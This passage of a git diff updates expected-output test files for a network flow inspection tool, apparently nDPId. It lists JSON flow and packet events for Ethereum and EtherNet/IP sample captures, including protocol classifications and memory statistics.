+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1578508364932,"flow_last_seen":1578508365309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":1315,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508364659,"flow_last_seen":1578508365043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":1158,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364650,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365751,"flow_last_seen":1578508365853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1396,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508366005,"flow_last_seen":1578508366135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":1439,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364422,"flow_last_seen":1578508365065,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578508365592,"flow_last_seen":1578508365773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1832,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1578508366020,"flow_last_seen":1578508366101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508364522,"flow_last_seen":1578508365036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1241,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365009,"flow_last_seen":1578508365126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1578508364824,"flow_last_seen":1578508365152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":1388,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00160{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","total-events-serialized":431}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 2000/2000
@@ -437,9 +437,9 @@
 ~~ total active/idle flows...: 74/74
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4857181 bytes
-~~ total memory freed........: 4857181 bytes
-~~ total allocations/frees...: 101827/101827
+~~ total memory allocated....: 4918190 bytes
+~~ total memory freed........: 4918190 bytes
+~~ total allocations/frees...: 103417/103417
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 165 chars
 ~~ json string max len.......: 1978 chars
diff --git a/test/results/ethernetIP.pcap.out b/test/results/ethernetIP.pcap.out
index d67212d72..78ba541c5 100644
--- a/test/results/ethernetIP.pcap.out
+++ b/test/results/ethernetIP.pcap.out
@@ -1,40 +1,40 @@
 00442{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ethernetIP.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7440000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1352718180263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":136,"pkt_l4_len":102,"ts_msec":1352718180263,"pkt":"AAC80WDaeOfR4AJeCABFAAB6cCZAAIAGAACNUQAKjVEAU8RjrxLdiI2HlJVDUVAY+XQbbAAAcAA6AAABAhAAAAAAGjkvAAAAAAAAAAAAAAAAAAoAAgChAAQACRM1ALEAJgDkagoCIAIkAQIABgASAEwCIHIkAADOBAABAEwCIHIkACw9BAABAA=="}
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7440000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1352718180264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1352718180264,"pkt":"eOfR4AJeAAC80WDaCABFAAAowW9AAEAGXmGNUQBTjVEACq8SxGOUlUNR3YiN2VAQD8bOTwAAAAAAAI1R"}
 02063{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1352718180264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1258,"pkt_l4_len":1224,"ts_msec":1352718180264,"pkt":"AAC80WDaeOfR4AJeCABFAATccChAAIAGAACNUQAKjVEAU8RjrxLdiI3ZlJVDUVAY+XQfzgAAcAAsAAABAhAAAAAAGzkvAAAAAAAAAAAAAAAAAAoAAgChAAQAChU1ALEAGACvuAoCIAIkAQEABABMAiByJAAEggYAAQBwADoAAAECEAAAAAAcOS8AAAAAAAAAAAAAAAAACgACAKEABAAFCzUAsQAmAHuyCgIgAiQBAgAGABIATAIgciQAGLcEAAEATAIgciQAvFQGAAEAcAAsAAABAhAAAAAAHTkvAAAAAAAAAAAAAAAAAAoAAgChAAQABg01ALEAGAAHpAoCIAIkAQEABABMAiByJAAEggYAAQBwAKoAAAECEAAAAAAeOS8AAAAAAAAAAAAAAAAACgACAKEABAABAzUAsQCWABkzCgIgAiQBCgAWACIALgA6AEYAUgBeAGoAdgCCAEwCIHIkAHR\/BwABAEwCIHIkANiMBAABAEwCIHIkAITEBAABAEwCIHIkAAznBQABAEwCIHIkABh0BwABAEwCIHIkADS+BgABAEwCIHIkABDjBAABAEwCIHIkADQ\/BgABAEwCIHIkADS8BQABAEwCIHIkADTGBgABAHAA4gAAAQIQAAAAAB85LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAIFNQCxAM4AoxkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABAoQYAAQBMAiByJADc\/QUAAQBMAiByJAD0hgUABgBMAiByJAAs5QUAAQBMAiByJACYFAcAAQBMAiByJACkkwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJABQpQUAAQBMAiByJABY4wQAAQBMAiByJAC4xwcAAwBMAiByJAC0zwQAAQBwACwAAAECEAAAAAAgOS8AAAAAAAAAAAAAAAAACgACAKEABAADBzUAsQAYAHenCgIgAiQBAQAEAEwCIHIkAGiiBwAJAHAAwgEAAQIQAAAAACE5LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAQJNQCxAK4Bf58KAiACJAEeAD4ASgBWAGIAbgB6AIYAkgCeAKoAtgDCAM4A2gDmAPIA\/gAKARYBIgEuAToBRgFSAV4BagF2AYIBjgGaAUwCIHIkAIx0BwABAEwCIHIkAKiiBwABAEwCIHIkAJg0BAABAEwCIHIkADgxBwABAEwCIHIkAChvBgABAEwCIHIkACiNBgABAEwCIHIkAAgQBgABAEwCIHIkANRpBwABAEwCIHIkAEB1BgABAEwCIHIkAPQcBgABAEwCIHIkAOwZBgABAEwCIHIkAIizBwABAEwCIHIkAOQgBgABAEwCIHIkAMgaBgABAEwCIHIkAGQ5BwABAEwCIHIkADi\/BgABAEwCIHIkACivBQABAEwCIHIkABwhBgABAEwCIHIkAEj1BQABAEwCIHIkAFT1BgABAEwCIHIkAAA8BgABAEwCIHIkAMRfBwABAEwCIHIkALCqBQABAEwCIHIkAKC1BgABAEwCIHIkAMT8BwABAEwCIHIkAMB0BgABAEwCIHIkAEzoBwABAEwCIHIkAGguBAABAEwCIHIkAHyvBQABAEwCIHIkALwJBgABAA=="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7440000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1352718180265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"ts_msec":1352718180265,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1RAAEAGjEiNUQA\/jVEACq8SzXF9dCfmE+ef0VAYEACJaQAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAncYAgLEAHAAzNYoAAAACAAYADgDMAAAAAQAAAMwAAAAFAAAA"}
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7440000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
 00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1352718180265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"ts_msec":1352718180265,"pkt":"AAC8x85WeOfR4AJeCABFAAF0cCpAAIAGAACNUQAKjVEAP81xrxIT55\/RfXQoLlAY9kIcUgAAcAA6AAAFAhMAAAAAZsC+AAAAAAAAAAAAAAAAAAoAAgChAAQABy8uALEAJgDoRwoCIAIkAQIABgASAEwCIHIkABi3BAABAEwCIHIkADxUBgABAHAA4gAABQITAAAAAGfAvgAAAAAAAAAAAAAAAAAKAAIAoQAEAAMnLgCxAM4AUkkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABEoQYAAQBMAiByJABc\/QUAAQBMAiByJAB0hgUABgBMAiByJACs5AUAAQBMAiByJACcFAcAAQBMAiByJACokwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJADQpAUAAQBMAiByJABY4wQAAQBMAiByJAC8xwcAAwBMAiByJAC0zwQAAQA="}
 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1352718180276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"ts_msec":1352718180276,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1ZAAEAGjEaNUQA\/jVEACq8SzXF9dCguE+ehHVAYEADbwgAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAlcYAgLEAHADoR4oAAAACAAYADgDMAAAAAAAAAMwAAAAFAAAA"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7440000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1352718180390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"ts_msec":1352718180390,"pkt":"AAC8X0j6eOfR4AJeCABFAADqcEVAAIAGAACNUQAKjVEAK81yrxIurdArV0tI1VAY+M4btAAAcACqAAAEAhAAAAAAVgG6AAAAAAAAAAAAAAAAAAoAAgChAAQAASuWALEAlgBI5QoCIAIkAQoAFgAiAC4AOgBGAFIAXgBqAHYAggBMAiByJABI8gcAAQBMAiByJAAY8QQAAQBMAiByJABUPgUAAQBMAiByJAB42QcAAQBMAiByJAC8YQYAAQBMAiByJAAgzgQAAQBMAiByJAC8LgUAAQBMAiByJACcBgQAAQBMAiByJACwAQYAAQBMAiByJAD8DwQAAQA="}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7440000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
 00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1352718180392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1352718180392,"pkt":"eOfR4AJeAAC8X0j6CABFAADAqJJAAEAGds6NUQArjVEACq8SzXJXS0jVLq3Q7VAYEAA2UAAAcACAAAAEAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQApcYAgLEAbABI5YoAAAAKABYAHgAmAC4ANgA+AEYATgBWAF4AzAAAAGC0GD\/MAAAAM1O1QswAAAC1P4xBzAAAAAAAAADMAAAAYLQYP8wAAAAAAKBAzAAAAAAAAEDMAAAAAAAAAMwAAAAAAAAAzAAAAAAAAAA="}
 01080{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1352718180392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":528,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":528,"pkt_l4_len":494,"ts_msec":1352718180392,"pkt":"AAC8X0j6eOfR4AJeCABFAAICcEdAAIAGAACNUQAKjVEAK81yrxIurdDtV0tJbVAY+DYczAAAcADCAQAEAhAAAAAAVwG6AAAAAAAAAAAAAAAAAAoAAgChAAQAAi2WALEArgFJUwoCIAIkAR4APgBKAFYAYgBuAHoAhgCSAJ4AqgC2AMIAzgDaAOYA8gD+AAoBFgEiAS4BOgFGAVIBXgFqAXYBggGOAZoBTAIgciQALBwHAAEATAIgciQA0BsGAAEATAIgciQAsBQHAAEATAIgciQA3PMHAAEATAIgciQAnDYFAAEATAIgciQAvAcHAAEATAIgciQAkNEFAAEATAIgciQAAH8HAAEATAIgciQATCMGAAEATAIgciQAOEkGAAEATAIgciQALIcEAAEATAIgciQAALQFAAEATAIgciQAqHwFAAEATAIgciQATJYHAAEATAIgciQAaBgHAAEATAIgciQA3PsGAAEATAIgciQATLwGAAEATAIgciQAGB0IAAEATAIgciQAcFMHAAEATAIgciQAvIMFAAEATAIgciQAvBkGAAEATAIgciQAOJQFAAEATAIgciQATLEFAAEATAIgciQA9HoGAAEATAIgciQApPIGAAEATAIgciQAFIEEAAEATAIgciQA2PAEAAEATAIgciQA+FMGAAEATAIgciQA2PUGAAEATAIgciQApF8HAAEA"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7440000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1352718180397,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"ts_msec":1352718180397,"pkt":"AAC8X0lReOfR4AJeCABFAADqcEpAAIAGAACNUQAKjVEAF\/T9rxIm2H0TxmFi41AY9W4boAAAcACqAAABAhAAAAAAo6iTAAAAAAAAAAAAAAAAAAoAAgChAAQAAQOLALEAlgBx7AoCIAIkAQQACgAoAEYAagBODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMQEAAf9ODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMgEAAf9OD5EbTE1TX0RJU0FCTEVfQkFSQ09ERV9TQ0FOTkVSAAEAAP5OD5EbTE1TX1NFVFBPSU5UQ0hBTkdFX1JFQ0VJVkVEAAEAAP4="}
